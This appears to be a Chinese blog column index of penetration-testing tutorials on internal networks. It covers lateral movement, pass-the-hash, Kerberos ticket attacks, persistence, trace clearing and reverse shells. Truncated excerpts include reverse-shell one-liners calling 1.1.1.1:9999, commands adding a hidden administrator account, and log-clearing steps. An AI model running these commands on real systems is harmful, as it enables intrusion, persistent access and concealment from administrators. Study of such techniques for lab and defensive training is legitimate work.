![](https://img-blog.csdnimg.cn/20190918140158853.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
内网渗透
文章平均质量分 89
此专栏结合了网络空间安全的护网攻防实战中的内网渗透的重要环节,内网对于国家还是企业都有极大的重要性,专栏中详细的介绍了整个内网实战中重要的攻击手段和知识点,以及相关内网渗透的工具的使用,比如msf,cs,炫彩蛇的使用,详细的介绍了内网渗透的信息收集,代理穿透,横向移动,权限维持,痕迹清除的整个流程。
炫彩@之星
喜爱渗透测试,喜爱网络安全,有喜欢渗透测试的小哥哥小姐姐可以一起学习和讨论哦。
展开
-
ATT&CK实战系列——红队实战(五)
ATT&CK实战系列——红队实战(五)文章目录ATT&CK实战系列——红队实战(五)前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记前言前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。靶场搭建靶场下载原创 2022-10-17 00:35:52 · 2488 阅读 · 0 评论 -
内网渗透-横向移动外部工具的使用
横向移动外部工具的使用前言文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块psexec首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话在已获得的shell中输入net use \192.168.52.141 /user:administrator “密码”(1)psexechttps://docs.microsoft.com/zh-cn/sysinternals/downloads/psexecpsexec使用建立IPC连接,无需原创 2022-10-01 01:24:36 · 2217 阅读 · 0 评论 -
内网渗透-内置工具横向移动
内置工具横向移动文章目录内置工具横向移动前言IPCSchtasksIPC+ATIPC+SC后记前言前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。IPCIPC+Schtasks(文件共享服务和定时任务)利用条件:开放了139,445端口必须开启IPC$文件共享服务需要目标机器的管理员账号和密码hashdumpload mimikatz得到账号和密码kerberossspwdigestnet view 当前的域有哪些主机net use 查看当前是否有原创 2022-10-01 01:24:03 · 1215 阅读 · 0 评论 -
内网渗透-域内的权限维持
域内的权限维持文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记前言上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。PTTPTT(票据)window认证机制http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE原创 2022-10-01 01:23:42 · 1004 阅读 · 0 评论 -
内网渗透-Hash传递攻击
Hash传递攻击文章目录Hash传递攻击前言psexec模块前言今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。psexec模块利用的前提是必须开放445端口首先,我们需要获得用户的hash值在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值Administrator的hash值如下:aad3b435b51404eea原创 2022-10-01 01:23:21 · 1593 阅读 · 0 评论 -
域权限维持—黄金票据和白金票据
黄金票据和白金票据前言某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击 一、Kerberos协议 首先了解下Kerberos协议,windows域认证常用协议,也是黄金票据和白银票据的攻击场景 大致流程如下:原创 2022-09-26 22:08:50 · 1339 阅读 · 0 评论 -
内网渗透-Linux权限维持
Linux权限维持文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记前言前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。ssh后门过滤ps -elf |grep 12345监听端口nc -lvvp 123查看端口netstat -anlp|grep 12345(1)ssh后门(脚本内容)(192.168.231.134)#!原创 2022-09-26 22:08:27 · 2365 阅读 · 0 评论 -
内网渗透-window权限维持
window权限维持文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记前言上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透有着至关重要的原创 2022-09-26 22:08:07 · 2199 阅读 · 2 评论 -
内网渗透-Windows&Linux痕迹清除
Windows&Linux痕迹清除文章目录Windows&Linux痕迹清除前言Windows痕迹清除Windows日志清理meterpreter清理日志Linux痕迹清除后记前言当我们进行内网一系列的渗透之后,就会留下一些命令的痕迹,我们离开的时候,为了防止管理员发现,我们就需要进行内网渗透最后一个环节的内容了,就是进行痕迹清除。命令有点多,大家好好做一下笔记吧。Windows痕迹清除Windows日志如何查看:事件查看器->windows日志win+r eventv原创 2022-09-26 16:34:42 · 5983 阅读 · 0 评论 -
内网渗透-内网代理穿透和内网横向移动
内网代理穿透和内网横向移动文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记前言进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。内网代理穿透首先,我们介绍几种代理工原创 2022-09-23 22:13:22 · 2203 阅读 · 0 评论 -
内网渗透-内网信息收集
内网信息收集文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记前言当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。msf模块中的信息收集Msf模块run post/run post/windo原创 2022-09-21 00:48:04 · 9413 阅读 · 0 评论 -
内网渗透系列之mimikatz的使用以及后门植入
内网渗透系列之mimikatz的使用以及后门植入文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记前言内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持原创 2022-09-04 23:15:57 · 4313 阅读 · 0 评论 -
内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记前言相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网原创 2022-09-04 23:15:38 · 2128 阅读 · 0 评论 -
内网渗透系列之真实内网环境搭建
真实内网环境搭建文章目录真实内网环境搭建前言靶机的准备后记前言最近学习了内网的一些知识,学会了域的创建,域渗透以及内网渗透方面的知识,这里就简单给大家介绍一下真实内网环境的搭建过程。靶机的准备这里需要5台机器,分别是kali+2台防火墙+2台服务器(内网机器)其中防火墙可以去网上下载。或者可以去我的资源那里下载。其中的话,就需要3张网卡了,VM1,VM2,VM8,其中VM1和VM2是仅主机模式,VM8是NAT模式。靶机的网卡设置如下:网卡设置:kali(VM1)192.168.101.102原创 2022-09-04 23:15:22 · 1781 阅读 · 0 评论 -
内网渗透-反弹shell的N种姿势
反弹shell的N种姿势文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接0x00 前言在渗透测试的过程中,在拿到webshell以后,原创 2022-09-04 23:14:32 · 691 阅读 · 0 评论 -
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
【横向移动】PsExec工具远程命令执行横向移动文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍PsExec介绍psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windo原创 2022-09-02 09:18:05 · 1545 阅读 · 0 评论 -
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
Windows RDP凭证的抓取和密码破解【密码抓取和爆破】文章目录Windows RDP凭证的抓取和密码破解【密码抓取和爆破】破解原理凭证的查看查看凭证命令在线破离线破解破解原理Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程原创 2022-09-02 09:13:15 · 1572 阅读 · 0 评论 -
内网渗透-frp 用于内网穿透的基本配置和使用
frp 用于内网穿透的基本配置和使用文章目录frp 用于内网穿透的基本配置和使用前言frpsfrpc后记参考前言frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。本文就以 配置 frp,使得可以从外网访问内网远程桌面(端口号 3389)为最终目标 展开。使用的公网服务器操作系统为 CentOS 7.6,内网的机器操作系统为 Windows 10。访问 frp 的网站以下原创 2022-09-01 13:56:43 · 1347 阅读 · 0 评论 -
内网渗透-常用反弹shell方法总结
常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell前言bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>原创 2022-08-28 00:00:00 · 4647 阅读 · 0 评论 -
内网渗透-windows权限维持的方法
windows权限维持的方法文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持一、影子账户1.使用如下命令创建隐藏用户并加入管理员组net user test$ 123456 /addnet localgroup administrators test$ /add创建成功后使用net user命令无法查看到此用原创 2022-08-26 00:56:01 · 1116 阅读 · 0 评论 -
内网渗透-内网横向移动的九种方式
内网横向移动的九种方式文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m原创 2022-08-26 00:54:50 · 1831 阅读 · 0 评论 -
内网渗透-linux权限维持
内网渗透-linux权限维持文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell添加用户UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。正常可以通过 “id” 来查看当前的用户的U原创 2022-08-25 07:54:27 · 628 阅读 · 0 评论 -
内网渗透-内网环境下的横向移动总结
内网环境下的横向移动总结原创 2022-08-19 09:13:53 · 1259 阅读 · 0 评论 -
内网渗透-实战|手把手教你如何进行内网渗透
实战|手把手教你如何进行内网渗透x00 Preface内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关原创 2022-08-18 15:55:50 · 1666 阅读 · 1 评论 -
内网渗透-Linux内网渗透
内网渗透-Linux内网渗透原创 2022-08-16 00:49:49 · 1635 阅读 · 0 评论 -
内网渗透-Windows内网渗透
内网渗透-Windows内网渗透文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.原创 2022-08-15 22:48:36 · 1371 阅读 · 0 评论 -
内网渗透-Earthworm的简单使用(内网穿透工具)
内网渗透-Earthworm的简单使用(内网穿透工具)原创 2022-08-11 10:31:04 · 1824 阅读 · 0 评论 -
内网渗透-Metasploit之——基本后渗透命令
内网渗透-Metasploit之——基本后渗透命令原创 2022-07-18 15:44:07 · 526 阅读 · 0 评论 -
ATT&CK实战系列——红队实战(—)
ATT&CK实战系列——红队实战(—)原创 2022-07-17 00:23:35 · 1312 阅读 · 4 评论 -
内网渗透-红队内网渗透工具(Viper)
红队内网渗透工具(Viper)原创 2022-05-22 20:53:09 · 8668 阅读 · 3 评论 -
内网渗透-cs之钓鱼测试攻击
cs之模拟钓鱼攻击原创 2022-05-08 19:10:39 · 3127 阅读 · 0 评论 -
内网渗透-cs上线之提权测试方法
cs上线之提权方法原创 2022-05-08 17:19:59 · 5125 阅读 · 2 评论 -
内网渗透-域环境的搭建
域环境的搭建原创 2022-05-08 16:17:23 · 1483 阅读 · 0 评论 -
内网渗透-cobaltstrike之cs上线获取shell
cobaltstrike之cs上线获取shell原创 2022-04-30 14:39:56 · 6956 阅读 · 6 评论